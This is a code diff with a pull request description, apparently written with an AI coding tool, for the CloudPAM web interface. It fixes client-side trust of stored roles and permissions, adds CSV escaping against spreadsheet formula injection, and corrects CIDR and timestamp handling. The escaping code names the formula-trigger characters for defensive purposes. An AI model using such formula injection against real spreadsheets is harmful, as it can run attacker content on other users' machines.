@@ -3,8 +3,10 @@ import type { HealthResponse, UserInfo, LoginResponse, MeResponse } from '../api
 
 // Non-sensitive display metadata persisted in localStorage for UX continuity.
 const AUTH_NAME_KEY = 'cloudpam_key_name'
-const AUTH_ROLE_KEY = 'cloudpam_role'
 const AUTH_TYPE_KEY = 'cloudpam_auth_type'
+// Legacy keys. Role and permissions are authorization inputs, so they are never
+// seeded from client-controlled storage; these are only cleared, never read.
+const AUTH_ROLE_KEY = 'cloudpam_role'
 const AUTH_PERMISSIONS_KEY = 'cloudpam_permissions'
 
 export interface AuthContextValue {
@@ -46,20 +48,16 @@ export function useAuth() {
 export function useAuthState(): AuthContextValue {
   const [isAuthenticated, setIsAuthenticated] = useState(false)
   const [keyName, setKeyName] = useState<string | null>(() => localStorage.getItem(AUTH_NAME_KEY))
-  const [role, setRole] = useState<string | null>(() => localStorage.getItem(AUTH_ROLE_KEY))
+  // Role and permissions start empty and are only ever populated from a server
+  // response (/api/v1/auth/me or a successful login). Seeding them from
+  // localStorage would let a client grant itself privileged UI by editing
+  // storage, and would survive a failed re-validation.
+  const [role, setRole] = useState<string | null>(null)
   const [authType, setAuthType] = useState<'session' | 'api_key' | null>(
     () => (localStorage.getItem(AUTH_TYPE_KEY) as 'session' | 'api_key') || null
   )
   const [currentUser, setCurrentUser] = useState<UserInfo | null>(null)
-  const [permissions, setPermissions] = useState<string[]>(() => {
-    const raw = localStorage.getItem(AUTH_PERMISSIONS_KEY)
-    if (!raw) return []
-    try {
-      return JSON.parse(raw)
-    } catch {
-      return []
-    }
-  })
+  const [permissions, setPermissions] = useState<string[]>([])
   const [authEnabled, setAuthEnabled] = useState(false)
   const [localAuthEnabled, setLocalAuthEnabled] = useState(false)
   const [needsSetup, setNeedsSetup] = useState(false)
@@ -89,9 +87,7 @@ export function useAuthState(): AuthContextValue {
           setRole(me.role)
           setAuthType(me.auth_type)
           setPermissions(me.permissions ?? [])
-          localStorage.setItem(AUTH_ROLE_KEY, me.role)
           localStorage.setItem(AUTH_TYPE_KEY, me.auth_type)
-          localStorage.setItem(AUTH_PERMISSIONS_KEY, JSON.stringify(me.permissions ?? []))
 
           if (me.auth_type === 'session' && me.user) {
             setCurrentUser(me.user)
@@ -121,8 +117,9 @@ export function useAuthState(): AuthContextValue {
     setCurrentUser(null)
     setPermissions([])
     localStorage.removeItem(AUTH_NAME_KEY)
-    localStorage.removeItem(AUTH_ROLE_KEY)
     localStorage.removeItem(AUTH_TYPE_KEY)
+    // Clear values written by older builds so they cannot linger.
+    localStorage.removeItem(AUTH_ROLE_KEY)
     localStorage.removeItem(AUTH_PERMISSIONS_KEY)
   }
 
@@ -156,9 +153,7 @@ export function useAuthState(): AuthContextValue {
     setAuthType('session')
 
     localStorage.setItem(AUTH_NAME_KEY, data.user.display_name || data.user.username)
-    localStorage.setItem(AUTH_ROLE_KEY, data.user.role)
     localStorage.setItem(AUTH_TYPE_KEY, 'session')
-    localStorage.setItem(AUTH_PERMISSIONS_KEY, JSON.stringify(data.permissions ?? []))
   }, [])
 
   const logout = useCallback(async () => {

--- a/ui/src/pages/BlocksPage.tsx
+++ b/ui/src/pages/BlocksPage.tsx
@@ -4,10 +4,10 @@ import { Search, LayoutGrid, Pencil, Trash2, X } from 'lucide-react'
 import { useBlocks } from '../hooks/useBlocks'
 import { useAccounts } from '../hooks/useAccounts'
 import { useToast } from '../hooks/useToast'
-import { patch, del } from '../api/client'
+import { get, patch, del } from '../api/client'
 import StatusBadge from '../components/StatusBadge'
 import { formatHostCount, getHostCount } from '../utils/format'
-import type { Block, PoolType, PoolStatus, UpdatePoolRequest } from '../api/types'
+import type { Block, Pool, PoolType, PoolStatus, UpdatePoolRequest } from '../api/types'
 
 export default function BlocksPage() {
   const navigate = useNavigate()
@@ -330,8 +330,27 @@ function EditBlockModal({
   const [accountId, setAccountId] = useState<string>(block.account_id ? String(block.account_id) : '')
   const [type, setType] = useState(block.type || 'subnet')
   const [status, setStatus] = useState(block.status || 'active')
+  // The blocks list response does not carry description, so load it from the
+  // pool detail endpoint. Tracking the loaded value lets an edit back to empty
+  // be sent as a real clear instead of being treated as "unchanged".
   const [description, setDescription] = useState('')
+  const [loadedDescription, setLoadedDescription] = useState('')
   const [saving, setSaving] = useState(false)
+
+  useEffect(() => {
+    let cancelled = false
+    get<Pool>(`/api/v1/pools/${block.id}`)
+      .then(pool => {
+        if (cancelled) return
+        const current = pool.description ?? ''
+        setDescription(current)
+        setLoadedDescription(current)
+      })
+      .catch(() => {
+        // Description is optional; leave the field blank if it cannot be loaded.
+      })
+    return () => { cancelled = true }
+  }, [block.id])
 
   async function handleSave() {
     setSaving(true)
@@ -343,7 +362,7 @@ function EditBlockModal({
       }
       if (type !== (block.type || 'subnet')) data.type = type as PoolType
       if (status !== (block.status || 'active')) data.status = status as PoolStatus
-      if (description) data.description = description
+      if (description !== loadedDescription) data.description = description
 
       await patch(`/api/v1/pools/${block.id}`, data)
       showToast(`Updated ${name}`, 'success')

--- a/ui/src/pages/ChangelogPage.tsx
+++ b/ui/src/pages/ChangelogPage.tsx
@@ -282,7 +282,9 @@ function ReleaseCard({
 }
 
 export default function ChangelogPage() {
-  const { role } = useAuth()
+  // The /config/updates route is gated on settings:read, so the link must use
+  // the same check. Gating on role === 'admin' hid it from permitted operators.
+  const { hasPermission } = useAuth()
   const [markdown, setMarkdown] = useState('')
   const [systemInfo, setSystemInfo] = useState<SystemInfoResponse | null>(null)
   const [loading, setLoading] = useState(true)
@@ -352,7 +354,7 @@ export default function ChangelogPage() {
           </div>
 
           <div className="flex flex-wrap gap-2">
-            {role === 'admin' ? (
+            {hasPermission('settings:read') ? (
               <Link
                 to="/config/updates"
                 className="inline-flex items-center gap-2 rounded-xl border border-slate-200 bg-white/85 px-4 py-2 text-sm font-medium text-slate-700 shadow-sm shadow-slate-200/50 transition hover:border-blue-300 hover:text-blue-700 dark:border-slate-700 dark:bg-slate-900/85 dark:text-slate-200 dark:hover:border-blue-700 dark:hover:text-blue-200"

--- a/ui/src/pages/LoginPage.tsx
+++ b/ui/src/pages/LoginPage.tsx
@@ -94,6 +94,8 @@ export default function LoginPage() {
                 <button
                   type="button"
                   onClick={() => setShowPassword(!showPassword)}
+                  aria-label={showPassword ? 'Hide password' : 'Show password'}
+                  aria-pressed={showPassword}
                   className="absolute inset-y-0 right-0 flex items-center pr-3 text-gray-400 hover:text-gray-600"
                 >
                   {showPassword ? <EyeOff className="w-4 h-4" /> : <Eye className="w-4 h-4" />}

--- a/ui/src/pages/SetupPage.tsx
+++ b/ui/src/pages/SetupPage.tsx
@@ -132,6 +132,8 @@ export default function SetupPage() {
               <button
                 type="button"
                 onClick={() => setShowPassword(!showPassword)}
+                aria-label={showPassword ? 'Hide password' : 'Show password'}
+                aria-pressed={showPassword}
                 className="absolute inset-y-0 right-0 flex items-center pr-3 text-gray-400 hover:text-gray-600"
               >
                 {showPassword ? <EyeOff className="w-4 h-4" /> : <Eye className="w-4 h-4" />}

--- a/ui/src/pages/UpdatesPage.tsx
+++ b/ui/src/pages/UpdatesPage.tsx
@@ -249,7 +249,10 @@ export default function UpdatesPage() {
     actionLoading ||
     pendingTargetVersion !== null ||
     isActiveUpgradeStatus(status?.status)
-  const canTriggerUpgrade = summary?.update_available === true && !upgradeInFlight
+  // The backend reports upgrade_supported=false when no control directory is
+  // configured; triggering then always fails, so do not offer the action.
+  const upgradeSupported = summary?.upgrade_supported !== false
+  const canTriggerUpgrade = summary?.update_available === true && upgradeSupported && !upgradeInFlight
 
   return (
     <div className="p-6 space-y-6">
@@ -272,6 +275,7 @@ export default function UpdatesPage() {
           <button
             onClick={() => void handleUpgrade()}
             disabled={!canTriggerUpgrade}
+            title={upgradeSupported ? undefined : 'In-app upgrades are not supported by this deployment'}
             className="inline-flex items-center gap-2 px-4 py-2 rounded-lg text-sm font-medium text-white bg-blue-600 hover:bg-blue-700 disabled:cursor-not-allowed disabled:bg-blue-400"
           >
             {upgradeInFlight ? <Loader2 className="w-4 h-4 animate-spin" /> : <ArrowUpCircle className="w-4 h-4" />}

--- a/ui/src/utils/csv.ts
+++ b/ui/src/utils/csv.ts
@@ -1,0 +1,26 @@
+// Leading characters that spreadsheet applications interpret as the start of a
+// formula. Prefixing with an apostrophe forces the cell to be read as text.
+const FORMULA_PREFIXES = ['=', '+', '-', '@', '\t', '\r']
+
+export function escapeCsvCell(value: unknown): string {
+  let cell = value === null || value === undefined ? '' : String(value)
+
+  if (cell.length > 0 && FORMULA_PREFIXES.includes(cell[0])) {
+    cell = `'${cell}`
+  }
+
+  // RFC 4180: quote the field and double any embedded quotes.
+  if (/[",\n\r]/.test(cell)) {
+    cell = `"${cell.replace(/"/g, '""')}"`
+  }
+
+  return cell
+}
+
+export function toCsvRow(cells: unknown[]): string {
+  return cells.map(escapeCsvCell).join(',')
+}
+
+export function toCsv(header: string[], rows: unknown[][]): string {
+  return [toCsvRow(header), ...rows.map(toCsvRow)].join('\n')
+}

--- a/ui/src/utils/format.ts
+++ b/ui/src/utils/format.ts
@@ -7,13 +7,16 @@ export function formatHostCount(count: number): string {
 export function getHostCount(cidr: string): number {
   if (!cidr) return 0
   const prefix = parseInt(cidr.split('/')[1], 10)
-  if (isNaN(prefix)) return 0
+  // Only IPv4 prefix lengths are meaningful here; anything else would produce
+  // a fractional or absurdly large host count.
+  if (isNaN(prefix) || prefix < 0 || prefix > 32) return 0
   return Math.pow(2, 32 - prefix)
 }
 
 export function formatTimeAgo(timestamp: string): string {
   if (!timestamp) return 'unknown'
   const date = new Date(timestamp)
+  if (isNaN(date.getTime())) return 'unknown'
   const now = new Date()
   const diffMs = now.getTime() - date.getTime()
   const diffMins = Math.floor(diffMs / 60000)

--- a/ui/src/wizard/SchemaPlanner.tsx
+++ b/ui/src/wizard/SchemaPlanner.tsx
@@ -3,6 +3,7 @@ import { Network, ArrowLeft, ArrowRight, Save, CheckCircle } from 'lucide-react'
 import type { Blueprint } from './data/blueprints'
 import type { Dimensions } from './steps/DimensionsStep'
 import type { SchemaNode } from './utils/cidr'
+import { toCsv } from '../utils/csv'
 import TemplateStep from './steps/TemplateStep'
 import StrategyStep from './steps/StrategyStep'
 import DimensionsStep from './steps/DimensionsStep'
@@ -101,7 +102,7 @@ export default function SchemaPlanner() {
 
       if (format === 'csv') {
         const rows = flatten(generatedSchema, null)
-        const csv = ['name,cidr,type,parent_name', ...rows.map((r) => r.join(','))].join('\n')
+        const csv = toCsv(['name', 'cidr', 'type', 'parent_name'], rows)
         const blob = new Blob([csv], { type: 'text/csv' })
         const url = URL.createObjectURL(blob)
         const a = document.createElement('a')

--- a/ui/src/wizard/steps/DimensionsStep.tsx
+++ b/ui/src/wizard/steps/DimensionsStep.tsx
@@ -90,6 +90,13 @@ export default function DimensionsStep({ dimensions, setDimensions, strategy }: 
     </div>
   )
 
+  // Both region-first and environment-first schemas allocate per region, so the
+  // regions list must stay visible (and counted) for both. account-first
+  // ignores regions entirely, so it must not silently inflate the estimate.
+  const usesRegions = strategy === 'region-first' || strategy === 'environment-first'
+  const regionCount = usesRegions ? dimensions.regions.length : 1
+  const accountAllocations = regionCount * dimensions.environments.length * dimensions.accountsPerEnv
+
   return (
     <div className="space-y-6">
       <div>
@@ -98,7 +105,7 @@ export default function DimensionsStep({ dimensions, setDimensions, strategy }: 
       </div>
 
       <div className="bg-white dark:bg-gray-800 border border-gray-200 dark:border-gray-700 rounded-lg p-6 space-y-6">
-        {strategy === 'region-first' && renderDimensionList('Regions', 'regions', dimensions.regions, Globe)}
+        {usesRegions && renderDimensionList('Regions', 'regions', dimensions.regions, Globe)}
         {renderDimensionList('Environments', 'environments', dimensions.environments, Server)}
         {renderDimensionList('Account Tiers', 'accountTiers', dimensions.accountTiers, Building)}
 
@@ -145,16 +152,9 @@ export default function DimensionsStep({ dimensions, setDimensions, strategy }: 
             <p className="font-medium">Capacity Planning Tip</p>
             <p className="mt-1">
               Based on your inputs, you'll need approximately{' '}
-              <strong>
-                {dimensions.regions.length * dimensions.environments.length * dimensions.accountsPerEnv}
-              </strong>{' '}
+              <strong>{accountAllocations}</strong>{' '}
               account allocations. With {dimensions.growthYears}x growth buffer, plan for{' '}
-              <strong>
-                {dimensions.regions.length *
-                  dimensions.environments.length *
-                  dimensions.accountsPerEnv *
-                  dimensions.growthYears}
-              </strong>{' '}
+              <strong>{accountAllocations * dimensions.growthYears}</strong>{' '}
               total.
             </p>
           </div>

--- a/ui/src/wizard/utils/cidr.ts
+++ b/ui/src/wizard/utils/cidr.ts
@@ -9,7 +9,9 @@ export function parse(cidr: string): ParsedCIDR {
   const [ip, prefix] = cidr.split('/')
   const octets = ip.split('.').map(Number)
   const prefixLen = parseInt(prefix)
-  const ipNum = (octets[0] << 24) + (octets[1] << 16) + (octets[2] << 8) + octets[3]
+  // `<< 24` yields a signed 32-bit result, so addresses above 127.255.255.255
+  // would come back negative. Coerce to unsigned.
+  const ipNum = (((octets[0] << 24) + (octets[1] << 16) + (octets[2] << 8) + octets[3]) >>> 0)
   return { ip, octets, prefixLen, ipNum }
 }
 


### PR DESCRIPTION
Closes the actionable findings in #224.

## Crash

**In-memory audit `List` panicked on negative offsets** — only the upper bound of the pagination window was clamped, so a negative offset reached the slice expression. The only crash-class item in the tracker.

## Security

- **`useAuth` trusted a client-controlled persisted role** before the server confirmed it. Role and permissions now start empty and are only ever populated from a server response; legacy keys are cleared, never read. Fixed entirely within `useAuth.ts` — `Sidebar.tsx` untouched. Includes a forged-`localStorage` test.
- **CSV export didn't escape cell values**, and didn't neutralize leading `=`, `+`, `-`, `@`, so a crafted pool name became a live formula when the export was opened in a spreadsheet.

## Correctness

Name length limits counted bytes not runes · LLM options couldn't set temperature to zero (zero read as unset) · CIDR host counts accepted impossible prefix lengths · invalid timestamps rendered as `NaN` · the wizard CIDR parser returned signed negatives above `127.255.255.255` · block descriptions couldn't be cleared to empty · capacity estimates depended on hidden regions for non-region strategies · OIDC custom scopes could omit the required `openid` scope.

## UI robustness

Collapse All didn't reach initially-expanded roots · the search modal advertised Esc but never handled it · the update banner threw when `localStorage` is unavailable (private browsing) · password visibility toggles were unlabeled for assistive tech.

## The `omitempty` finding — deliberately not applied

The tracker asks to add `omitempty` to `UpdatePool.AccountID`. **That would be wrong**, and the analysis is worth recording:

1. `domain.UpdatePool` is never unmarshaled from a request body — `pool_handlers.go` decodes into `map[string]json.RawMessage`, resolves the tri-state by key *presence*, then constructs it with an already-resolved value.
2. It is never marshaled anywhere in the repo.
3. Every store treats nil as **clear**, not unset, and assigns unconditionally — the opposite of what `omitempty` advertises.
4. The only externally visible artifact is the generated OpenAPI component, and since `AccountID` is a pointer it's never marked required either way — **adding the tag produces a byte-identical spec.** The change is a no-op on the published contract.
5. `terraform-provider-cloudpam/internal/client/pools.go` builds its PATCH body as a map *specifically because* this field lacks `omitempty`, citing it by name.

So it would change nothing observable today, contradict the store contract, and break "clear the account" the moment anyone marshaled this type. Left alone, invariant documented on the field, and `internal/api/pool_account_patch_test.go` added so a future "cleanup" fails loudly.

## Already fixed elsewhere — no change invented

`useAccounts` and `useDrift` stale-response races were both closed by #234's `useLatestRequest`.

## Skipped (owned by other branches)

`DiscoveryWizard` IAM snippet · `Header.tsx` double-fire · `Layout.tsx` Ctrl/Cmd+K guard · `capture_screenshots.js` lifecycle (fixed in #239) · openapi-validate size limit. The `Header`/`Layout` items are confirmed still open on master.

## Tests

Mutation-tested: reverting `PoolTree.tsx`, `BlocksPage.tsx`, `format.ts` and `cidr.ts` to master makes 13 of the new assertions fail, confirming they catch the real bugs.

No existing assertion changed. Every modified test file is a pure insertion (`+47 -0`, `+66 -0`, `+61 -0`, `+60 -0`, `+16 -0`, `+30 -0`); the single deletion is a `setup()` helper gaining an optional defaulted parameter.

## Verification

```
go build ./... && go vet ./... && go test -race ./...   pass
go test -tags sqlite ./...                              pass
npx tsc --noEmit && npx vitest run                      37 files, 194 tests passed
golangci-lint                                           0 issues
```

Refs #224

🤖 Generated with [Claude Code](https://claude.com/claude-code)